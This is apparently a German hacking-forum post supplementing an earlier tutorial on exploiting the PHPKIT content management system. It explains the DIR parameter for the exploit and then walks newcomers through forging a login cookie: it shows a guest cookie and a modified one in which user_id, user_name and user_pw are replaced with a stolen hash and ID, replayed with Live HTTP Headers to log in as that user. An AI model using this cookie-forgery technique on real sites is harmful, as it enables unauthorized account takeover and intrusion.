schönes tut, jetzt werde ich mal ein wenig ergänzen, aber in textform. mir viel auf das bei neulingen noch fragen offen bleiben könnten die ich an dieser stelle beantworten möchte:
1. was tun wenn das phpkit garnicht in einem unterordner ist, was gibt man jetzt bei DIR ein??
Antwort: ganz einfach, man gibt /./ ein, der punkt steht für das aktuelle verzeichnis.
###########################
2. was tun wenn man den hash nich gecrackt bekommt??
Antwort: stickwort cookie faken. man benötigt dazu das firefox add-on live http headers (man kann natürlcih die cookies in der datei modifizieren aber ich finde es so komfortabler)... wenn man nicht eingeloggt ist könnte der cookie folgendermaße aussehen:
Code:
user_id=0; user_name=Gast; user_pw=b462dacd430fe56780b2b9a73e589330; PHPKITSID=22e717d7b10fb0f357d4c5363fa470fb; pkSITE=a%3A1%3A%7Bi%3A0%3Bi%3A1193958000%3B%7D
beispiel ist die seite aus dem tut. wir löschen phpkitsid komplett raus, tragen bei user_pw den hash ein, bei user_name den usernamen und bei user_id die id die wir auch beim exploit verwendet haben. modifiziert kann der cookie so aussehen:
Code:
user_id=1; user_name=Nightmage; user_pw=e5dafb64135ad68c1024a4cf1fc8b70c; pkSITE=a%3A1%3A%7Bi%3A0%3Bi%3A1193958000%3B%7D
So nun noch ab die post mit einem klick auf wiederholen und wir sind tatsächlich eingeloggt!